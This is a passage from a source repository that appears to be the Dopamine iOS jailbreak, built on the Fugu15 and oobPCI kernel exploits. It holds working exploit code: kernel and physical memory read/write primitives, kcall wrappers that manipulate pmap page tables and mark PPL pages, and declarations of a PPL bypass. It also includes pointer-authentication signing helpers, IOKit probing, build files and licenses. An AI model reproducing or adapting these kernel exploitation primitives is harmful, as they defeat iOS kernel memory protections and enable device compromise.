| while (1) { 19 | kern_return_t kr = (kern_return_t) kcall(pmap_enter_options_addr_ptr, pmap, va, pa, VM_PROT_READ | VM_PROT_WRITE, 0, 0, 1, 1); 20 | if (kr != KERN_RESOURCE_SHORTAGE) { 21 | return kr; 22 | } 23 | else { 24 | // On resource shortage, alloc new page 25 | //pmap_alloc_page_for_ppl(); 26 | } 27 | } 28 | } 29 | 30 | void pmap_remove(uint64_t pmap, uint64_t start, uint64_t end) { 31 | uint64_t pmap_remove_options_ptr = SLIDE(gOffsets.pmap_remove_options); 32 | 33 | kcall(pmap_remove_options_ptr, pmap, start, end, 0x100, 0, 0, 0, 0); 34 | } 35 | 36 | void pmap_set_nested(uint64_t pmap) { 37 | uint64_t pmap_set_nested_ptr = SLIDE(gOffsets.pmap_set_nested); 38 | 39 | kcall(pmap_set_nested_ptr, pmap, 0, 0, 0, 0, 0, 0, 0); 40 | } 41 | 42 | kern_return_t pmap_nest(uint64_t grand, uint64_t subord, uint64_t vstart, uint64_t size) { 43 | uint64_t pmap_nest_ptr = SLIDE(gOffsets.pmap_nest); 44 | 45 | return (kern_return_t) kcall(pmap_nest_ptr, grand, subord, vstart, size, 0, 0, 0, 0); 46 | } 47 | 48 | void pmap_mark_page_as_ppl_page(uint64_t page) { 49 | uint64_t pmap_mark_page_as_ppl_page_ptr = SLIDE(gOffsets.pmap_mark_page_as_ppl_page); 50 | 51 | kcall(pmap_mark_page_as_ppl_page_ptr, page, 1, 0, 0, 0, 0, 0, 0); 52 | } 53 | 54 | uint64_t pmap_alloc_page_for_kern(void) 55 | { 56 | uint64_t pmap_mark_page_as_ppl_page_ptr = SLIDE(gOffsets.pmap_alloc_page_for_kern); 57 | return kcall(pmap_mark_page_as_ppl_page_ptr, 0, 0, 0, 0, 0, 0, 0, 0); 58 | } 59 | 60 | void pmap_alloc_page_for_ppl(void) 61 | { 62 | //thread_t self = current_thread(); 63 | 64 | //uint16_t thread_options = self->options; 65 | //self->options |= TH_OPT_VMPRIV; 66 | uint64_t pa = pmap_alloc_page_for_kern(); 67 | //self->options = thread_options; 68 | 69 | if (pa != 0) { 70 | pmap_mark_page_as_ppl_page(pa); 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernel.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef kernel_h 10 | #define kernel_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | kern_return_t pmap_enter_options_addr(uint64_t pmap, uint64_t pa, uint64_t va); 17 | void pmap_remove(uint64_t pmap, uint64_t start, uint64_t end); 18 | 19 | void pmap_set_nested(uint64_t pmap); 20 | kern_return_t pmap_nest(uint64_t grand, uint64_t subord, uint64_t vstart, uint64_t size); 21 | 22 | void pmap_mark_page_as_ppl_page(uint64_t page); 23 | uint64_t pmap_alloc_page_for_kern(void); 24 | void pmap_alloc_page_for_ppl(void); 25 | 26 | #endif /* kernel_h */ 27 | 28 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernrw_alloc.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernrw_alloc.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef kernrw_alloc_h 10 | #define kernrw_alloc_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool kernread (uint64_t addr, size_t len, void *buffer); 17 | bool kernwrite(uint64_t addr, void *buffer, size_t len); 18 | 19 | uint64_t kmemAlloc(uint64_t size, void **mappedAddr, bool leak); 20 | 21 | #endif /* kernrw_alloc_h */ 22 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/mach_host.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | 33 | import ; /* for host_page_size() */ 34 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/oobPCI.h: -------------------------------------------------------------------------------- 1 | // 2 | // oobPCI.c 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | 10 | #ifndef oobPCI_h 11 | #define oobPCI_h 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | bool oobPCI_init(uint64_t *kBase, uint64_t *virtBase, uint64_t *physBase); 18 | 19 | #endif /* oobPCI_h */ 20 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/physrw.h: -------------------------------------------------------------------------------- 1 | // 2 | // physrw.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef physrw_h 10 | #define physrw_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool buildPhysPrimitive(uint64_t kernelBase); 17 | 18 | // R/W 19 | bool physread(uint64_t addr, size_t len, void *buffer); 20 | bool physwrite(uint64_t addr, void *buffer, size_t len); 21 | 22 | uint64_t rp64(uint64_t addr); 23 | uint32_t rp32(uint64_t addr); 24 | uint16_t rp16(uint64_t addr); 25 | uint8_t rp8(uint64_t addr); 26 | 27 | // Address translation 28 | uint64_t translateAddr_inTTEP(uint64_t ttep, uint64_t virt); 29 | uint64_t translateAddr(uint64_t virt); 30 | 31 | // Internal function 32 | // Can be used once to map arbitrary physical memory 33 | uint64_t physrw_map_once(uint64_t addr); 34 | 35 | #endif /* physrw_h */ 36 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/sleep.c: -------------------------------------------------------------------------------- 1 | #include "includeme.h" 2 | #include "generated/task.h" 3 | 4 | int __semwait_signal(int cond_sem, int mutex_sem, int timeout, int relative, int64_t tv_sec, int32_t tv_nsec); 5 | 6 | semaphore_t clock_sem = 0; 7 | 8 | int nanosleep(int64_t tv_sec, int32_t tv_nsec) 9 | { 10 | if (clock_sem == 0) { 11 | semaphore_create(mach_task_self_, (semaphore_t *)&clock_sem, 0, 0); 12 | } 13 | return __semwait_signal(clock_sem, 0, 1, 1, tv_sec, tv_nsec); 14 | } 15 | 16 | 17 | int usleep(uint64_t useconds) 18 | { 19 | return nanosleep(useconds / 1000000, 1000 * (useconds % 1000000)); 20 | } 21 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/sleep.h: -------------------------------------------------------------------------------- 1 | int nanosleep(int64_t tv_sec, int32_t tv_nsec); 2 | int usleep(uint64_t useconds); 3 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/task.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/thread.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/tlbFail.h: -------------------------------------------------------------------------------- 1 | // 2 | // tlbFail.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef tlbFail_h 10 | #define tlbFail_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool pplBypass(void); 17 | 18 | void* getPhysMapWindow(uint64_t phys); 19 | 20 | bool physwrite_PPL(uint64_t addr, void *buffer, size_t len); 21 | bool kernwrite_PPL(uint64_t addr, void *buffer, size_t len); 22 | 23 | uint64_t pmap_lv2(uint64_t pmap, uint64_t virt); 24 | 25 | #endif /* tlbFail_h */ 26 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/virtrw.c: -------------------------------------------------------------------------------- 1 | #include "virtrw.h" 2 | 3 | void kreadbuf(uint64_t kaddr, void* output, size_t size) 4 | { 5 | uint64_t endAddr = kaddr + size; 6 | uint32_t outputOffset = 0; 7 | unsigned char* outputBytes = (unsigned char*)output; 8 | 9 | for(uint64_t curAddr = kaddr; curAddr < endAddr; curAddr += 4) 10 | { 11 | uint32_t k = kread32(curAddr); 12 | 13 | unsigned char* kb = (unsigned char*)&k; 14 | for(int i = 0; i < 4; i++) 15 | { 16 | if(outputOffset == size) break; 17 | outputBytes[outputOffset] = kb[i]; 18 | outputOffset++; 19 | } 20 | if(outputOffset == size) break; 21 | } 22 | } 23 | 24 | void kwritebuf(uint64_t kaddr, void* input, size_t size) 25 | { 26 | uint64_t endAddr = kaddr + size; 27 | uint32_t inputOffset = 0; 28 | unsigned char* inputBytes = (unsigned char*)input; 29 | 30 | for(uint64_t curAddr = kaddr; curAddr < endAddr; curAddr += 4) 31 | { 32 | uint32_t toWrite = 0; 33 | int bc = 4; 34 | 35 | uint64_t remainingBytes = endAddr - curAddr; 36 | if(remainingBytes < 4) 37 | { 38 | toWrite = kread32(curAddr); 39 | bc = (int)remainingBytes; 40 | } 41 | 42 | unsigned char* wb = (unsigned char*)&toWrite; 43 | for(int i = 0; i < bc; i++) 44 | { 45 | wb[i] = inputBytes[inputOffset]; 46 | inputOffset++; 47 | } 48 | 49 | kwrite32(curAddr, toWrite); 50 | } 51 | } 52 | 53 | uint16_t kread16(uint64_t kaddr) 54 | { 55 | uint16_t outBuf; 56 | kreadbuf(kaddr, &outBuf, sizeof(uint16_t)); 57 | return outBuf; 58 | } 59 | 60 | uint8_t kread8(uint64_t kaddr) 61 | { 62 | uint8_t outBuf; 63 | kreadbuf(kaddr, &outBuf, sizeof(uint8_t)); 64 | return outBuf; 65 | } 66 | 67 | void kwrite16(uint64_t kaddr, uint16_t val) 68 | { 69 | kwritebuf(kaddr, &val, sizeof(uint16_t)); 70 | } 71 | 72 | void kwrite8(uint64_t kaddr, uint8_t val) 73 | { 74 | kwritebuf(kaddr, &val, sizeof(uint8_t)); 75 | } 76 | 77 | uint64_t kread_ptr(uint64_t kaddr) { 78 | uint64_t ptr = kread64(kaddr); 79 | if ((ptr >> 55) & 1) { 80 | return ptr | 0xFFFFFF8000000000; 81 | } 82 | 83 | return ptr; 84 | } 85 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/virtrw.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | uint64_t (^kread64)(uint64_t kaddr); 6 | uint32_t (^kread32)(uint64_t kaddr); 7 | 8 | void (^kwrite64)(uint64_t kaddr, uint64_t val); 9 | void (^kwrite32)(uint64_t kaddr, uint32_t val); 10 | 11 | void kreadbuf(uint64_t kaddr, void* output, size_t size); 12 | void kwritebuf(uint64_t kaddr, void* input, size_t size); 13 | 14 | uint16_t kread16(uint64_t kaddr); 15 | uint8_t kread8(uint64_t kaddr); 16 | 17 | void kwrite16(uint64_t kaddr, uint16_t val); 18 | void kwrite8(uint64_t kaddr, uint8_t val); 19 | 20 | uint64_t kread_ptr(uint64_t kaddr); 21 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/xprr.h: -------------------------------------------------------------------------------- 1 | // 2 | // xprr.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef xprr_h 10 | #define xprr_h 11 | 12 | #define PTE_TO_PERM(pte) ((((pte) >> 4ULL) & 0xC) | (((pte) >> 52ULL) & 2) | (((pte) >> 54ULL) & 1)) 13 | #define _PERM_TO_PTE(perm) ((((perm) & 0xC) << 4ULL) | (((perm) & 2) << 52ULL) | (((perm) & 1) << 54ULL)) 14 | #define PERM_TO_PTE(perm) _PERM_TO_PTE((uint64_t) (perm)) 15 | 16 | #define PERM_KRW_URW 0x7 // R/W for kernel and user 17 | 18 | #define PTE_NON_GLOBAL (1ULL << 11ULL) 19 | #define PTE_VALID (1ULL << 10ULL) // Access flag 20 | #define PTE_OUTER_SHAREABLE (2ULL << 8ULL) 21 | #define PTE_INNER_SHAREABLE (3ULL << 8ULL) 22 | 23 | #define PTE_LEVEL3_ENTRY (PTE_VALID | 0x3ULL) 24 | 25 | #endif /* xprr_h */ 26 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Lars Fröder (opa334) 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LICENSE_Fugu15.md: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Pinauten GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | 2 | all %: 3 | @./BaseBin/pack.sh 4 | @xattr -rc Tools >/dev/null 2>&1 5 | $(MAKE) -C Exploits/oobPCI $@ 6 | $(MAKE) -C Dopamine $@ 7 | 8 | clean: 9 | @./BaseBin/clean.sh 10 | 11 | update: all 12 | @./jbupdate.sh 13 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /Packages 4 | /*.xcodeproj 5 | xcuserdata/ 6 | DerivedData/ 7 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 8 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "Fugu15KernelExploit", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .library( 15 | name: "Fugu15KernelExploit", 16 | targets: ["Fugu15KernelExploit"]) 17 | ], 18 | dependencies: [ 19 | .package(url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 20 | .package(path: "../ProcessCommunication"), 21 | .package(url: "https://github.com/pinauten/PatchfinderUtils", .branch("master")), 22 | .package(url: "https://github.com/opa334/KernelPatchfinder", .branch("master")), 23 | ], 24 | targets: [ 25 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 26 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 27 | .target(name: "CBindings"), 28 | .target( 29 | name: "Fugu15KernelExploit", 30 | dependencies: ["CBindings", "SwiftUtils", "ProcessCommunication", "PatchfinderUtils", "KernelPatchfinder"]), 31 | ] 32 | ) 33 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/README.md: -------------------------------------------------------------------------------- 1 | # Fugu15KernelExploit 2 | 3 | This package can be used to easily launch the Fugu15 kernel exploit and use it's capabilities. 4 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/CBindings.h: -------------------------------------------------------------------------------- 1 | // 2 | // CBindings.h 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef CBindings_h 10 | #define CBindings_h 11 | 12 | #import 13 | #include 14 | #include 15 | #include 16 | 17 | #include "../../../../../Dopamine/Dopamine/constants.h" 18 | #include "libjailbreak.h" 19 | #include "posix_spawn.h" 20 | #include "th_state.h" 21 | #include "wifi.h" 22 | 23 | extern int decompress_tar_zstd(const char* src_file_path, const char* dst_file_path); 24 | extern int loadEmbeddedSignature(NSString* filePath); 25 | uint64_t getPCIMemorySize(void); 26 | NSString *getBootManifestHash(void); 27 | 28 | // Also define some IOKit stuff... 29 | extern const mach_port_t kIOMainPortDefault; 30 | 31 | extern mach_port_t IORegistryEntryFromPath(mach_port_t mainPort, const io_string_t __nonnull path); 32 | extern CFTypeRef __nonnull IORegistryEntryCreateCFProperty(mach_port_t entry, CFStringRef __nonnull key, 33 | CFAllocatorRef __nullable allocator, 34 | uint32_t options); 35 | extern kern_return_t IOObjectRelease(mach_port_t object); 36 | 37 | extern uint64_t reboot3(uint64_t how, uint64_t unk); 38 | 39 | #endif /* CBindings_h */ 40 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/th_state.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2006, 2008 Apple,Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. Please obtain a copy of the License at 10 | * http://www.opensource.apple.com/apsl/ and read it before using this 11 | * file. 12 | * 13 | * The Original Code and all software distributed under the License are 14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 18 | * Please see the License for the specific language governing rights and 19 | * limitations under the License. 20 | * 21 | * @APPLE_LICENSE_HEADER_END@ 22 | */ 23 | 24 | #ifndef TH_STATE_H_ 25 | #define TH_STATE_H_ 26 | 27 | #include 28 | #include 29 | 30 | #ifdef __arm64__ 31 | 32 | uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts); 33 | void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc); 34 | uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts); 35 | void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr); 36 | 37 | #endif /* defined __arm64__ */ 38 | 39 | struct exception_message_reply { 40 | mach_msg_header_t hdr; 41 | NDR_record_t NDR; 42 | kern_return_t result; 43 | }; 44 | 45 | #endif /* !defined TH_STATE_H_ */ 46 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/include/wifi.h: -------------------------------------------------------------------------------- 1 | bool wifiIsEnabled(void); 2 | void setWifiEnabled(bool enabled); -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/libjailbreak.m: -------------------------------------------------------------------------------- 1 | #include 2 | #import 3 | #import 4 | 5 | void *libJailbreakHandle = NULL; 6 | 7 | NSString *prebootPath(NSString *path) 8 | { 9 | static NSString *sPrebootPrefix = nil; 10 | static dispatch_once_t onceToken; 11 | dispatch_once (&onceToken, ^{ 12 | NSMutableString* bootManifestHashStr; 13 | io_registry_entry_t registryEntry = IORegistryEntryFromPath(kIOMainPortDefault, "IODeviceTree:/chosen"); 14 | if (registryEntry) { 15 | CFDataRef bootManifestHash = (CFDataRef)IORegistryEntryCreateCFProperty(registryEntry, CFSTR("boot-manifest-hash"), kCFAllocatorDefault, 0); 16 | if (bootManifestHash) { 17 | const UInt8* buffer = CFDataGetBytePtr(bootManifestHash); 18 | bootManifestHashStr = [NSMutableString stringWithCapacity:(CFDataGetLength(bootManifestHash) * 2)]; 19 | for (CFIndex i = 0; i < CFDataGetLength(bootManifestHash); i++) { 20 | [bootManifestHashStr appendFormat:@"%02X", buffer[i]]; 21 | } 22 | CFRelease(bootManifestHash); 23 | } 24 | } 25 | 26 | if (bootManifestHashStr) { 27 | NSString *activePrebootPath = [@"/private/preboot/" stringByAppendingPathComponent:bootManifestHashStr]; 28 | NSArray *subItems = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:activePrebootPath error:nil]; 29 | for (NSString *subItem in subItems) { 30 | if ([subItem hasPrefix:@"jb-"]) { 31 | sPrebootPrefix = [[activePrebootPath stringByAppendingPathComponent:subItem] stringByAppendingPathComponent:@"procursus"]; 32 | break; 33 | } 34 | } 35 | } 36 | else { 37 | sPrebootPrefix = @"/var/jb"; 38 | } 39 | }); 40 | 41 | if (path) { 42 | return [sPrebootPrefix stringByAppendingPathComponent:path]; 43 | } 44 | else { 45 | return sPrebootPrefix; 46 | } 47 | } 48 | 49 | void *loadLibJailbreak(void) 50 | { 51 | if (libJailbreakHandle) return libJailbreakHandle; 52 | libJailbreakHandle = dlopen(prebootPath(@"basebin/libjailbreak.dylib").UTF8String, RTLD_NOW); 53 | return libJailbreakHandle; 54 | } -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/pci_offset.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | 5 | uint64_t getPCIMemorySize(void) 6 | { 7 | uint64_t pciMemorySize = 0; 8 | 9 | io_iterator_t iterator; 10 | kern_return_t kr; 11 | 12 | kr = IOServiceGetMatchingServices(kIOMainPortDefault, IOServiceMatching("IOPCIDevice"), &iterator); 13 | if (kr != KERN_SUCCESS) { 14 | printf("Error finding IOPCIDevice: %x\n", kr); 15 | return 0; 16 | } 17 | 18 | io_service_t service = IOIteratorNext(iterator); 19 | while (service) { 20 | io_name_t name; 21 | kr = IORegistryEntryGetName(service, name); 22 | if (kr == KERN_SUCCESS) { 23 | if(strcmp(name, "wlan") == 0) { 24 | CFMutableDictionaryRef properties; 25 | kr = IORegistryEntryCreateCFProperties(service, &properties, kCFAllocatorDefault, kNilOptions); 26 | if (kr == KERN_SUCCESS) { 27 | CFTypeRef memory = CFDictionaryGetValue(properties, CFSTR("IODeviceMemory")); 28 | if (CFGetTypeID(memory) == CFArrayGetTypeID()) 29 | { 30 | NSArray* array = (__bridge id)memory; 31 | NSArray* fArray = array.firstObject; 32 | NSNumber* size = fArray.firstObject[@"length"]; 33 | pciMemorySize = [size unsignedLongLongValue]; 34 | } 35 | CFRelease(properties); 36 | } 37 | } 38 | } 39 | IOObjectRelease(service); 40 | service = IOIteratorNext(iterator); 41 | } 42 | IOObjectRelease(iterator); 43 | 44 | return pciMemorySize; 45 | } 46 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/th_state.c: -------------------------------------------------------------------------------- 1 | // 2 | // th_state.h 3 | // kexploitd 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | 12 | #ifdef __arm64__ 13 | 14 | #include 15 | 16 | uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts) { 17 | return arm_thread_state64_get_pc(*ts); 18 | } 19 | 20 | void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc) { 21 | void *ptr = ptrauth_sign_unauthenticated((void*)pc, ptrauth_key_function_pointer, 0); 22 | arm_thread_state64_set_pc_fptr(*ts, ptr); 23 | } 24 | 25 | uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts) { 26 | return arm_thread_state64_get_lr(*ts); 27 | } 28 | 29 | void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr) { 30 | void *ptr = ptrauth_sign_unauthenticated((void*)lr, ptrauth_key_function_pointer, 0); 31 | arm_thread_state64_set_lr_fptr(*ts, ptr); 32 | } 33 | 34 | #endif /* defined __arm64__ */ 35 | -------------------------------------------------------------------------------- /Packages/Fugu15KernelExploit/Sources/CBindings/wifi.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | 4 | void *wifiManager = NULL; 5 | void *(*WiFiManagerClientCreate)(CFAllocatorRef allocator, int flags); 6 | CFPropertyListRef (*WiFiManagerClientCopyProperty)(void *manager, CFStringRef property); 7 | void (*WiFiManagerClientSetProperty)(void *manager, CFStringRef property, CFPropertyListRef value); 8 | 9 | void loadWifiManager(void) 10 | { 11 | static dispatch_once_t onceToken; 12 | dispatch_once (&onceToken, ^{ 13 | void *wifiHandle = dlopen("/System/Library/PrivateFrameworks/MobileWiFi.framework/MobileWiFi", RTLD_NOW); 14 | WiFiManagerClientCreate = dlsym(wifiHandle, "WiFiManagerClientCreate"); 15 | WiFiManagerClientCopyProperty = dlsym(wifiHandle, "WiFiManagerClientCopyProperty"); 16 | WiFiManagerClientSetProperty = dlsym(wifiHandle, 